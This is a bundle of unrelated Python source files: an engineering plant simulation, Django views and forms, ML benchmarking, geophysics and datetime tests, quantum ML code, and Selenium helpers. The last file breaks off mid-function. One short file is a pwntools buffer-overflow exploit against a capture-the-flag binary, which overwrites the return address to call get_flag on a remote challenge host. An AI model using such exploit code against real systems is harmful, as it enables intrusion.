c1.set_attr(fluid={'water': 1, 'TVP1': 0, 'air': 0}, p=100, T=371)
# steam generator pressure values
c31.set_attr(p=103.56)
c35.set_attr(p=103.42)
# turbine pressure values
c3.set_attr(p=33.61, m=38.969)
c5.set_attr(p=18.58)
c7.set_attr(p=17.1, T=371)
c8.set_attr(p=7.98)
c10.set_attr(p=2.73)
c12.set_attr(p=0.96)
c14.set_attr(p=0.29)
# preheater pressure values
c19.set_attr(p=14.755)
c21.set_attr(p=9.9975, state='l')
c23.set_attr(p=8.7012, state='l')
c25.set_attr(state='l')
c27.set_attr(p=125)
c29.set_attr(p=112)
# condensation
c16.set_attr(p=0.08)
# feedwater tank
c26.set_attr(x=0)
# a stable solution is generated for parts of the network
SEGSvi.solve(mode='design')
# SEGSvi.save('SEGSvi')
# delete old connections and finalize model
SEGSvi.del_conns(c19, c21, c23, c27, c29, c37, c42, c47, c52, c57)
c19 = Connection(condpump, 'out1', lppre1_sub, 'in2', label='19')
c20 = Connection(lppre1_sub, 'out2', lppre1, 'in2', label='20')
c21 = Connection(lppre1, 'out2', lppre2_sub, 'in2', label='21')
c22 = Connection(lppre2_sub, 'out2', lppre2, 'in2', label='22')
c23 = Connection(lppre2, 'out2', lppre3_sub, 'in2', label='23')
c24 = Connection(lppre3_sub, 'out2', lppre3, 'in2', label='24')
c27 = Connection(fwp, 'out1', hppre1_sub, 'in2', label='27')
c28 = Connection(hppre1_sub, 'out2', hppre1, 'in2', label='28')
c29 = Connection(hppre1, 'out2', hppre2_sub, 'in2', label='29')
c30 = Connection(hppre2_sub, 'out2', hppre2, 'in2', label='30')
c37 = Connection(hppre2, 'out1', hppre2_sub, 'in1', label='37')
c38 = Connection(hppre2_sub, 'out1', v1, 'in1', label='38')
c42 = Connection(hppre1, 'out1', hppre1_sub, 'in1', label='42')
c43 = Connection(hppre1_sub, 'out1', v2, 'in1', label='43')
c47 = Connection(lppre3, 'out1', lppre3_sub, 'in1', label='47')
c48 = Connection(lppre3_sub, 'out1', v3, 'in1', label='48')
c52 = Connection(lppre2, 'out1', lppre2_sub, 'in1', label='52')
c53 = Connection(lppre2_sub, 'out1', v4, 'in1', label='53')
c57 = Connection(lppre1, 'out1', lppre1_sub, 'in1', label='57')
c58 = Connection(lppre1_sub, 'out1', v5, 'in1', label='58')
SEGSvi.add_conns(
c19, c20, c21, c22, c23, c24, c27, c28, c29, c30, c37, c38, c42, c43, c47,
c48, c52, c53, c57, c58)
# specification of missing parameters
c19.set_attr(p=14.755)
c21.set_attr(p=9.9975, state='l')
c23.set_attr(p=8.7012, state='l')
c27.set_attr(p=125)
c29.set_attr(p=112)
# solve final state
SEGSvi.solve(mode='design')
# print results to prompt and generate model documentation
SEGSvi.print_results()
fmt = {
'latex_body': True,
'include_results': True,
'HeatExchanger': {
'params': ['Q', 'ttd_l', 'ttd_u', 'pr1', 'pr2']},
'Condenser': {
'params': ['Q', 'ttd_l', 'ttd_u', 'pr1', 'pr2']},
'Connection': {
'p': {'float_fmt': '{:,.4f}'},
's': {'float_fmt': '{:,.4f}'},
'h': {'float_fmt': '{:,.2f}'},
'fluid': {'include_results': False}
},
'include_results': True,
'draft': False
}
document_model(SEGSvi, fmt=fmt)
# carry out exergy analysis
ean = ExergyAnalysis(SEGSvi, E_P=[power], E_F=[heat_input_bus], E_L=[exergy_loss_bus])
ean.analyse(pamb=pamb, Tamb=Tamb)
# print exergy analysis results to prompt
ean.print_results()
# generate Grassmann diagram
links, nodes = ean.generate_plotly_sankey_input()
fig = go.Figure(go.Sankey(
arrangement="snap",
node={
"label": nodes,
'pad': 11,
'color': 'orange'},
link=links))
fig.show()
|
from django.shortcuts import render
def index(request):
""" The view that will render the home page """
return render(request, '{{ cookiecutter.main_app }}/home.html', context={})
|
import amorf.datasets as ds
import amorf.problemTransformation as pt
import amorf.metrics as metrics
import numpy as np
from sklearn.model_selection import KFold
edm = ds.EDM().get_numpy()
rf1 = ds.RiverFlow1().get_numpy()
wq = ds.WaterQuality().get_numpy()
transCond = ds.TransparentConductors().get_numpy()
dataset_names = ['EDM', 'RF1', 'Water Quality', 'Transparent Conductors']
datasets = [edm, rf1, wq, transCond]
results_datasets = []
for dataset in datasets:
selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
all_results = []
for selector in selectors:
SM = pt.SingleTargetMethod(selector)
X = dataset[0]
y = dataset[1]
kf = KFold(n_splits=5, random_state=1, shuffle=True)
selector_results = []
for train_index, test_index in kf.split(X):
prediction = SM.fit(
X[train_index], y[train_index]).predict(X[test_index])
result = metrics.average_relative_root_mean_squared_error(
prediction, y[test_index])
selector_results.append(result)
all_results.append(selector_results)
means_and_std = []
for result in all_results:
mean, std = np.mean(result), np.std(result)
means_and_std.append([mean, std])
results_datasets.append(means_and_std)
results_datasets = np.around(results_datasets,decimals=3)
dataset_counter = 0
output = ""
for dataset in results_datasets:
result_counter = 0
print(dataset_names[dataset_counter])
output += dataset_names[dataset_counter] + '\n\n'
dataset_counter += 1
for selector in dataset:
print(selectors[result_counter])
print("Mean\t\t\tStd Dev\n {} \t {}".format(selector[0], selector[1]))
output += selectors[result_counter] + '\n'
output += "Mean\t\t\tStd Dev\n {} \t {}\n".format(
selector[0], selector[1])
result_counter += 1
with open("SingleTarget_CV.txt", "w") as text_file:
text_file.write(output)
|
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import numpy as np
import math
from brightics.common.groupby import _function_by_group
from brightics.common.utils import check_required_parameters
from brightics.common.utils import get_default_from_parameters_if_required
from brightics.common.validation import validate, greater_than_or_equal_to, raise_error, require_param
from itertools import product
from brightics.common.utils import check_required_parameters
from brightics.common.exception import BrighticsFunctionException
def search(table, **params):
check_required_parameters(_search, params, ['table'])
params = get_default_from_parameters_if_required(params, _search)
param_validation_check = []
validate(*param_validation_check)
return _search(table, **params)
def search_user_dict(table, **params):
check_required_parameters(_search, params, ['table'])
params = get_default_from_parameters_if_required(params, _search)
param_validation_check = []
validate(*param_validation_check)
return _search(table, **params)
def _search(table, user_dict=pd.DataFrame(), input_cols=[], search_words=[], synonym_dict=[], main_operator='and'):
if len(search_words) == 0:
raise BrighticsFunctionException('0033', 'Search Words')
for search_word in search_words:
if search_word is None:
raise BrighticsFunctionException('0033', 'Search Words')
_table = table.copy()
filter_list = []
if len(input_cols) == 0:
validate(require_param('input_cols'))
for _list in product(input_cols, search_words):
c, od = _list
filter_list.append([c, od.strip('\'')])
_out_table = _table
filtered_set = set(_out_table.index)
cond = np.full(len(_table), True).tolist()
for _filter in filter_list:
cond = (cond) & (_table[_filter[0]].str.contains(_filter[1]))
_out_table = _table.loc[list(filtered_set.intersection(set(_table[cond].index)))]
if len(user_dict.index) != 0:
filter_list = []
additional_search_words = []
for i, key in enumerate(user_dict.iloc[:, 0]):
if key in search_words:
additional_search_words.extend([synonym.strip() for synonym in user_dict.iloc[:, 1][i].split(',')])
search_words = additional_search_words
# search_words = [user_dict['value'][i] for i, key in enumerate(user_dict['key']) if key in search_words]
for _list in product(input_cols, search_words):
c, od = _list
filter_list.append([c, od.strip('\'')])
filtered_set = set()
syno_cond = np.full(len(_table), False).tolist()
for _filter in filter_list:
syno_cond = (syno_cond) | (_table[_filter[0]].str.contains(_filter[1]))
syno_cond = syno_cond | cond
_out_table = _table.loc[list(filtered_set.union(set(_table[syno_cond].index)))]
return {'out_table': _out_table}
def search2(table, **params):
check_required_parameters(_search2, params, ['table'])
params = get_default_from_parameters_if_required(params, _search2)
param_validation_check = []
validate(*param_validation_check)
return _search2(table, **params)
def _collect_search_text(keywords, keyword_dict):
if keywords is None:
search_text = keyword_dict[keyword_dict.columns[0]].values
elif keyword_dict is None:
search_text = keywords
else:
search_text = np.concatenate([keywords, keyword_dict[keyword_dict.columns[0]]])
return list(set(search_text))
def _link_word_synonyms(word, synonyms):
if synonyms is not None:
parse_synonyms = [synonym.strip() for synonym in synonyms.split(",")]
parse_synonyms.insert(0, word)
return '|'.join(parse_synonyms)
return word
def _find_synonyms(search_text, synonym_dict):
columns = synonym_dict.columns
words = synonym_dict[columns[0]]
synonyms = synonym_dict[columns[1]]
for idx in range(len(synonym_dict)):
text = synonym_dict[columns[0]][idx]
if text in search_text:
search_idx = search_text.index(text)
search_text[search_idx] = _link_word_synonyms(words[idx], synonyms[idx])
return search_text
def _search2(table, input_cols, hold_cols=None, bool_search="or", keyword_dict=None, keywords=None, synonym_dict=None, remove_na="no"):
if keywords is None and keyword_dict is None:
raise ValueError('At least one of Search Words and User Dictionary must be included.')
input_table = table[input_cols]
if hold_cols is None:
hold_table = table.drop(input_cols, axis=1)
length_ht = len(table.columns) - len(input_cols)
else:
hold_table = table[hold_cols]
length_ht = len(hold_cols)
search_text = _collect_search_text(keywords, keyword_dict)
if synonym_dict is not None:
search_text = _find_synonyms(search_text, synonym_dict)
if bool_search == 'and':
expr = '(?=.*{})'
search_str = ''.join(expr.format(text) for text in search_text)
else:
search_str = '|'.join(search_text)
cond = input_table.stack().str.contains(search_str).unstack()
if remove_na == "any":
out_table = pd.concat([input_table[cond], hold_table], axis=1).dropna(thresh=len(input_cols) + length_ht).reset_index(drop=True)
elif remove_na == "all":
out_table = pd.concat([input_table[cond], hold_table], axis=1).dropna(thresh=length_ht + 1).reset_index(drop=True)
else:
out_table = pd.concat([input_table[cond], hold_table], axis=1)
return {'out_table': out_table}
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# Test functions
import unittest
import numpy as np
from SimPEG import tests, mkvc
from SimPEG.electromagnetics import natural_source as nsem
from scipy.constants import mu_0
TOLr = 5e-2
TOL = 1e-4
FLR = 1e-20 # "zero", so if residual below this --> pass regardless of order
CONDUCTIVITY = 1e1
MU = mu_0
# Test the Jvec derivative
def DerivJvecTest(inputSetup, comp="All", freq=False, expMap=True):
(M, freqs, sig, sigBG, rx_loc) = inputSetup
survey, simulation = nsem.utils.test_utils.setupSimpegNSEM_ePrimSec(
inputSetup, comp=comp, singleFreq=freq, expMap=expMap
)
print("Using {0} solver for the simulation".format(simulation.Solver))
print(
"Derivative test of Jvec for eForm primary/secondary for {} comp at {}\n".format(
comp, survey.freqs
)
)
# simulation.mapping = Maps.ExpMap(simulation.mesh)
# simulation.sigmaPrimary = np.log(sigBG)
x0 = np.log(sigBG)
# cond = sig[0]
# x0 = np.log(np.ones(simulation.mesh.nC)*cond)
# simulation.sigmaPrimary = x0
# if True:
# x0 = x0 + np.random.randn(simulation.mesh.nC)*cond*1e-1
survey = simulation.survey
def fun(x):
return simulation.dpred(x), lambda x: simulation.Jvec(x0, x)
return tests.checkDerivative(fun, x0, num=3, plotIt=False, eps=FLR)
def DerivProjfieldsTest(inputSetup, comp="All", freq=False):
survey, simulation = nsem.utils.test_utils.setupSimpegNSEM_ePrimSec(
inputSetup, comp, freq
)
print("Derivative test of data projection for eFormulation primary/secondary\n")
# simulation.mapping = Maps.ExpMap(simulation.mesh)
# Initate things for the derivs Test
src = survey.source_list[0]
np.random.seed(1983)
u0x = np.random.randn(survey.mesh.nE) + np.random.randn(survey.mesh.nE) * 1j
u0y = np.random.randn(survey.mesh.nE) + np.random.randn(survey.mesh.nE) * 1j
u0 = np.vstack((mkvc(u0x, 2), mkvc(u0y, 2)))
f0 = simulation.fieldsPair(survey.mesh, survey)
# u0 = np.hstack((mkvc(u0_px,2),mkvc(u0_py,2)))
f0[src, "e_pxSolution"] = u0[: len(u0) / 2] # u0x
f0[src, "e_pySolution"] = u0[len(u0) / 2 : :] # u0y
def fun(u):
f = simulation.fieldsPair(survey.mesh, survey)
f[src, "e_pxSolution"] = u[: len(u) / 2]
f[src, "e_pySolution"] = u[len(u) / 2 : :]
return (
rx.eval(src, survey.mesh, f),
lambda t: rx.evalDeriv(src, survey.mesh, f0, mkvc(t, 2)),
)
return tests.checkDerivative(fun, u0, num=3, plotIt=False, eps=FLR)
class NSEM_DerivTests(unittest.TestCase):
def setUp(self):
pass
# Do a derivative test of Jvec
def test_derivJvec_impedanceAll(self):
self.assertTrue(
DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "Imp", 0.1)
)
def test_derivJvec_zxxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "xx", 0.1))
def test_derivJvec_zxyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "xy", 0.1))
def test_derivJvec_zyxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "yx", 0.1))
def test_derivJvec_zyyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "yy", 0.1))
# Tipper
def test_derivJvec_tipperAll(self):
self.assertTrue(
DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "Tip", 0.1)
)
def test_derivJvec_tzxr(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "zx", 0.1))
def test_derivJvec_tzyi(self):
self.assertTrue(DerivJvecTest(nsem.utils.test_utils.halfSpace(1e-2), "zy", 0.1))
if __name__ == "__main__":
unittest.main()
|
from django.db import connection
from . import PostgreSQLTestCase
try:
from django.contrib.postgres.signals import get_hstore_oids, get_citext_oids
except ImportError:
pass # pyscogp2 isn't installed.
class OIDTests(PostgreSQLTestCase):
def assertOIDs(self, oids):
self.assertIsInstance(oids, tuple)
self.assertGreater(len(oids), 0)
self.assertTrue(all(isinstance(oid, int) for oid in oids))
def test_hstore_cache(self):
with self.assertNumQueries(0):
get_hstore_oids(connection.alias)
def test_citext_cache(self):
with self.assertNumQueries(0):
get_citext_oids(connection.alias)
def test_hstore_values(self):
oids, array_oids = get_hstore_oids(connection.alias)
self.assertOIDs(oids)
self.assertOIDs(array_oids)
def test_citext_values(self):
oids = get_citext_oids(connection.alias)
self.assertOIDs(oids)
|
# coding=utf-8
from django import forms
from django.contrib.auth.forms import UserChangeForm
from models import Customer, CustomerSetting, ACTION_TYPE
from captcha.fields import CaptchaField, CaptchaTextInput
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext_lazy as _
class CustomerForm(UserChangeForm):
class Meta:
model = Customer
fields = ['company', 'email', 'contact', 'mobile', 'emergency_contact', 'emergency_mobile', 'password']
class CustomerSettingForm(forms.ModelForm):
class Meta:
model = CustomerSetting
exclude = ['customer']
class CustomerRelaySettingForm(forms.ModelForm):
class Meta:
model = CustomerSetting
fields = ['bounce', 'notice', 'bigmail']
class CustomerCollectSettingForm(forms.ModelForm):
def clean_spamrpt_sendtime(self):
data = self.cleaned_data['spamrpt_sendtime']
b = self.data.get('is_spamrpt_sendtime', '')
if not b:
return None
if b and not data:
raise forms.ValidationError(u"请设置隔离报告发送时间")
return data
class Meta:
model = CustomerSetting
exclude = ['customer', 'bounce', 'can_view_mail', 'bigmail', 'notice', 'transfer_max_size', 'replace_sender',
'check_autoreply', 'service_notice', 'interval_spamrpt']
class MyAuthenticationForm(AuthenticationForm):
captcha = CaptchaField()
def clean(self):
super(MyAuthenticationForm, self).clean()
user_cache = self.user_cache
user_type = user_cache.type
status = user_cache.status
gateway_status = user_cache.gateway_status
if (user_type in ['relay', 'all'] and status != 'disabled') or (
user_type in ['collect', 'all'] and gateway_status != 'disabled'):
return self.cleaned_data
raise forms.ValidationError(
_(u'密码错误或账户被禁用!'),
code='invalid_login',
params={'username': self.username_field.verbose_name},
)
class OperateLogSearchForm(forms.Form):
date_start = forms.DateField(label=_(u'开始日期'), required=False,
widget=forms.DateInput(
attrs={'class': 'dateinput', 'readonly': 'readonly', 'size': 12}))
date_end = forms.CharField(label=_(u'结束日期'), required=False,
widget=forms.DateInput(
attrs={'class': 'dateinput ', 'readonly': 'readonly', 'size': 12}))
action = forms.ChoiceField(label=_(u'操作类型'), required=False, choices=ACTION_TYPE)
|
import pickle
from copy import deepcopy
from datetime import date
from datetime import datetime
from datetime import time
from datetime import timedelta
import pytest
import pendulum
from pendulum import timezone
from pendulum.tz.timezone import Timezone
@pytest.fixture
def p():
return pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
@pytest.fixture
def p1(p):
return p.in_tz("America/New_York")
@pytest.fixture
def dt():
tz = timezone("Europe/Paris")
return tz.convert(datetime(2016, 8, 27, 12, 34, 56, 123456))
def test_timetuple(p, dt):
assert dt.timetuple() == p.timetuple()
def test_utctimetuple(p, dt):
assert dt.utctimetuple() == p.utctimetuple()
def test_date(p, dt):
assert p.date() == dt.date()
def test_time(p, dt):
assert p.time() == dt.time()
def test_timetz(p, dt):
assert p.timetz() == dt.timetz()
def test_astimezone(p, dt, p1):
assert p.astimezone(p1.tzinfo) == dt.astimezone(p1.tzinfo)
def test_ctime(p, dt):
assert p.ctime() == dt.ctime()
def test_isoformat(p, dt):
assert p.isoformat() == dt.isoformat()
def test_utcoffset(p, dt):
assert p.utcoffset() == dt.utcoffset()
def test_tzname(p, dt):
assert p.tzname() == dt.tzname()
def test_dst(p, dt):
assert p.dst() == dt.dst()
def test_toordinal(p, dt):
assert p.toordinal() == dt.toordinal()
def test_weekday(p, dt):
assert p.weekday() == dt.weekday()
def test_isoweekday(p, dt):
assert p.isoweekday() == dt.isoweekday()
def test_isocalendar(p, dt):
assert p.isocalendar() == dt.isocalendar()
def test_fromtimestamp():
p = pendulum.DateTime.fromtimestamp(0, pendulum.UTC)
dt = datetime.fromtimestamp(0, pendulum.UTC)
assert p == dt
def test_utcfromtimestamp():
p = pendulum.DateTime.utcfromtimestamp(0)
dt = datetime.utcfromtimestamp(0)
assert p == dt
def test_fromordinal():
assert datetime.fromordinal(730120) == pendulum.DateTime.fromordinal(730120)
def test_combine():
p = pendulum.DateTime.combine(date(2016, 1, 1), time(1, 2, 3, 123456))
dt = datetime.combine(date(2016, 1, 1), time(1, 2, 3, 123456))
assert p == dt
def test_hash(p, dt):
assert hash(p) == hash(dt)
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
dt2 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
dt3 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="America/Toronto")
assert hash(dt1) == hash(dt2)
assert hash(dt1) != hash(dt3)
def test_pickle():
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz="Europe/Paris")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert dt1 == dt2
def test_pickle_with_integer_tzinfo():
dt1 = pendulum.datetime(2016, 8, 27, 12, 34, 56, 123456, tz=0)
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert dt1 == dt2
def test_proper_dst():
dt = pendulum.datetime(1941, 7, 1, tz="Europe/Amsterdam")
assert dt.dst() == timedelta(0, 6000)
def test_deepcopy():
dt = pendulum.datetime(1941, 7, 1, tz="Europe/Amsterdam")
assert dt == deepcopy(dt)
def test_pickle_timezone():
dt1 = pendulum.timezone("Europe/Amsterdam")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert isinstance(dt2, Timezone)
dt1 = pendulum.timezone("UTC")
s = pickle.dumps(dt1)
dt2 = pickle.loads(s)
assert isinstance(dt2, Timezone)
|
from collections import namedtuple
from string import Template
from typing import Any
import cupy
import torch
__all__ = ["Stream", "get_dtype_str", "load_kernel"]
Stream = namedtuple("Stream", ["ptr"])
def get_dtype_str(t: torch.Tensor) -> str:
if isinstance(t, torch.cuda.FloatTensor):
return "float"
elif isinstance(t, torch.cuda.DoubleTensor):
return "double"
raise NotImplemented(f"Tensor type {t} not supported")
@cupy.util.memoize(for_each_device=True)
def load_kernel(kernel_name: Any, code: str, **kwargs) -> Any:
code = Template(code).substitute(**kwargs)
kernel_code = cupy.cuda.compile_with_cache(code)
return kernel_code.get_function(kernel_name)
CUDA_NUM_THREADS = 1024
def GET_BLOCKS(N: int) -> int:
"""
:param N:
:type N:
:return:
:rtype:
"""
return (N + CUDA_NUM_THREADS - 1) // CUDA_NUM_THREADS
kernel_loop = """
#define CUDA_KERNEL_LOOP(i, n) \
for (int i = blockIdx.x * blockDim.x + threadIdx.x; \
i < (n); \
i += blockDim.x * gridDim.x)
"""
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
logger = logging.getLogger(__name__)
def exception_caught_in_background_thread(e):
"""
Function which handled exceptions that are caught in background thread. This is
typically called from the callback thread inside the pipeline. These exceptions
need special handling because callback functions are typically called inside a
non-application thread in response to non-user-initiated actions, so there's
nobody else to catch them.
This function gets called from inside an arbitrary thread context, so code that
runs from this function should be limited to the bare minumum.
:param Error e: Exception object raised from inside a background thread
"""
# @FUTURE: We should add a mechanism which allows applications to receive these
# exceptions so they can respond accordingly
logger.error(msg="Exception caught in background thread. Unable to handle.", exc_info=e)
|
import unittest
from dart.globals import ImportParser, PartOfParser
class TestImport(unittest.TestCase):
def test_import(self):
parser = ImportParser()
elem = parser.parse("import 'package:flutter/widgets.dart';", 0)
self.assertEqual(elem.content(), "import 'package:flutter/widgets.dart';")
self.assertEqual(elem.target.content(), "'package:flutter/widgets.dart'")
self.assertEqual(elem.alias, None)
elem = parser.parse("import 'package:html/parser.dart' as parser;", 0)
self.assertEqual(elem.content(), "import 'package:html/parser.dart' as parser;")
self.assertEqual(elem.target.content(), "'package:html/parser.dart'")
self.assertEqual(elem.alias.content(), "parser")
elem = parser.parse("import \"package:flutter/widgets.dart\";", 0)
self.assertEqual(elem.content(), "import \"package:flutter/widgets.dart\";")
self.assertEqual(elem.target.content(), "\"package:flutter/widgets.dart\"")
self.assertEqual(elem.alias, None)
elem = parser.parse("import \"package:html/parser.dart\" as parser;", 0)
self.assertEqual(elem.content(), "import \"package:html/parser.dart\" as parser;")
self.assertEqual(elem.target.content(), "\"package:html/parser.dart\"")
self.assertEqual(elem.alias.content(), "parser")
def test_part_of(self):
parser = PartOfParser()
elem = parser.parse("part 'parser/border.dart';", 0)
self.assertEqual(elem.content(), "part 'parser/border.dart';")
self.assertEqual(elem.target.content(), "'parser/border.dart'")
elem = parser.parse("part of 'parser/border.dart';", 0)
self.assertEqual(elem.content(), "part of 'parser/border.dart';")
self.assertEqual(elem.target.content(), "'parser/border.dart'")
elem = parser.parse("part \"parser/border.dart\";", 0)
self.assertEqual(elem.content(), "part \"parser/border.dart\";")
self.assertEqual(elem.target.content(), "\"parser/border.dart\"")
elem = parser.parse("part of \"parser/border.dart\";", 0)
self.assertEqual(elem.content(), "part of \"parser/border.dart\";")
self.assertEqual(elem.target.content(), "\"parser/border.dart\"")
if __name__ == "__main__":
unittest.main()
|
from pwn import *
io = remote('redirect.do-not-trust.hacking.run', 10356)
e = ELF('pwn1_sctf_2016')
address = e.symbols['get_flag']
log.success('get_flag_address => %s' % hex(address).upper())
payload = b'I'*20 + b'a'*0x4 + p32(address)
# payload = b'I'*20 + b'a'*0x4 + p32(0x8048F0D)
io.sendline(payload)
io.interactive()
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nisqai.measure import MeasurementOutcome
from numpy import array
from pyquil import get_qc
from pyquil.api import QuantumComputer
# TODO: This should be updated to something like
# from nisqai.trainer import this_optimization_method
# for now this is just for simplicity
# from scipy.optimize import minimize
from nisqai.optimize import minimize
class Network:
"""Network class."""
def __init__(self, layers, computer, predictor=None):
"""Initializes a network with the input layers.
Args:
layers : iterable
Iterable object of network elements.
Examples:
layers = [DenseAngleEncoding, ProductAnsatz, Measurement]
leads to a network of the form
----[State Prep]----[Gate]----[Measure]----
Network elements must be in a valid ordering to create a network.
Criteria:
(1) Must start with an encoding ansatz.
(2) Must end with a measurement ansatz.
(3) Any number of unitary ansatze can be implemented in between.
(4) If network continues after measurement, an encoding ansatz
must follow a measurement ansatz.
computer : Union[str, pyquil.api.QuantumComputer]
Specifies which computer to run the network on.
Examples:
"Aspen-1-2Q-B"
"1q-qvm"
"5q-qvm"
predictor : Callable
Function that inputs a bit string and outputs a label
(i.e., either 0 or 1) representing the class.
"""
# TODO: check if ordering of layers is valid
# Store the layers and individual elements
# TODO: are both needed? which is better?
self._layers = layers
self._encoder = layers[0]
self._ansatz = layers[1]
self._measurement = layers[2]
# Store the computer backend
if type(computer) == str:
self.computer = get_qc(computer)
elif type(computer) == QuantumComputer:
self.computer = computer
else:
raise TypeError
# Number of data points
self.num_data_points = self._encoder.data.num_samples
# TODO: Make sure the predictor function is valid (returns 0 or 1)
self.predictor = predictor
@property
def data(self):
"""Returns the LabeledCData object of the network's encoder."""
return self._encoder.data
def _build(self, data_ind):
"""Builds the network as a sequence of quantum circuits."""
# TODO: what about multicircuit networks?
# note 2/4/19: I think this could be handled with another class
# Grab the initial encoder circuit for the given index
circuit = self._encoder[data_ind]
# Add all other layers
# TODO: allow self.layers to take sublists
# for example, [encoder, [layer1, layer2, layer3, ...], measure]
# this could make it easier to build networks using, say, list comprehensions
for ii in range(1, len(self._layers)):
circuit += self._layers[ii]
# Order the given circuit and return it
circuit.order()
return circuit
def compile(self, index, shots):
"""Returns the compiled program for the data point
indicated by the index.
Args:
index : int
Index of data point.
shots : int
Number of times to run the circuit.
"""
# Get the right program to compile. Note type(program) == BaseAnsatz.
program = self._build(index)
# Compile the program to the appropriate computer
return program.compile(self.computer, shots)
def propagate(self, index, angles=None, shots=1000):
"""Runs the network (propagates a data point) and returns the circuit result.
Args:
index : int
Specifies the index of the data point to propagate.
angles : Union[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Get the compiled executable instructions
executable = self.compile(index, shots)
# Use the memory map from the ansatz parameters
if angles is None:
mem_map = self._ansatz.params.memory_map()
else:
mem_map = self._ansatz.params.update_values_memory_map(angles)
# Run the program and store the raw results
output = self.computer.run(executable, memory_map=mem_map)
# Return a MeasurementOutcome of the results
return MeasurementOutcome(output)
def predict(self, index, angles=None, shots=1000):
"""Returns the prediction of the data point corresponding to the index.
Args:
index : int
Specifies the index of the data point to get a prediction of.
angles : Union[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Propagate the network to get the outcome
output = self.propagate(index, angles, shots)
# Use the predictor function to get the prediction from the output
# TODO: NOTE: This is not compatible with classical costs such as cross entropy.
prediction = self.predictor(output)
# Return the prediction
return prediction
def predict_all(self, angles=None, shots=1000):
"""Returns predictions for all data points.
Args:
angles : Untion[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit for one prediction.
"""
# Propagate the network to get the outcomes
return array([self.predict(ii, angles, shots) for ii in range(self.num_data_points)])
def cost_of_point(self, index, angles=None, shots=1000):
"""Returns the cost of a particular data point.
Args:
index : int
Specifies the data point.
angles : Union(dict, list)
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Get the network's prediction of the data point
prediction = self.predict(index, angles, shots)
# Get the actual label of the data point
label = self._encoder.data.labels[index]
# TODO: Generalize to arbitrary cost functions.
# Input a cost function into the Network, then use this.
return int(prediction != label)
def cost(self, angles, shots=1000):
"""Returns the total cost of the network at the given angles.
Args:
angles : Union(dict, list)
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
Returns : float
Total cost of the network.
"""
# Variable to store the cost
val = 0.0
# Add the cost for each data point
for ii in range(self.num_data_points):
val += self.cost_of_point(ii, angles, shots)
# Return the total normalized cost
return val / self.num_data_points
def train(self, initial_angles, trainer="COBYLA", updates=False, shots=1000, **kwargs):
"""Adjusts the parameters in the Network to minimize the cost.
Args:
initial_angles : Union[dict, list]
trainer : callable
Optimization function used to minimize the cost.
Defaults to "COBYLA"
updates : bool (default: False)
If True, cost value at each iteration is printed to the console.
shots : int (default: 1000)
Number of times to run a single circuit.
kwargs:
Keyword arguments sent into the `options` argument in the
nisqai.optimize.minimize method. For example:
>>> Network.train(initial_angles, trainer="Powell", maxfev=100)
will call
>>> nisqai.optimize.minimize(cost, initial_angles,
>>> method="Powell", options=dict(maxfev=100))
This is consistent with how scipy.optimize.minimize is formatted.
"""
# Define the objective function
def obj(angles):
val = self.cost(angles=angles, shots=shots)
if updates:
print("Current cost: %0.2f" % val)
return val
# Call the trainer
res = minimize(obj, initial_angles, method=trainer, options=kwargs)
# TODO: Define a NISQAI standard output for trainer results
return res
def __getitem__(self, index):
"""Returns the network with state preparation for the data
point indicated by item.
Args:
index : int
Index of data point.
"""
return self._build(index)
def __str__(self):
"""Returns the circuit for the zeroth data point."""
# TODO: return a text drawing of the network
return self[0]
|
from selenium.webdriver.common.by import (
By
)
from selenium.webdriver.support import (
expected_conditions as EC
)
from selenium.webdriver.support.ui import (
WebDriverWait
)
def get_element_by_css_selector(driver, tag, value):
''' Get a specified element by tag and attribute value.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, f'{tag}.{value}'))
)
if is_located:
return driver.find_element(By.CSS_SELECTOR, f'{tag}.{value}')
def get_element_by_id(driver, id):
''' Get a specified element by id.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
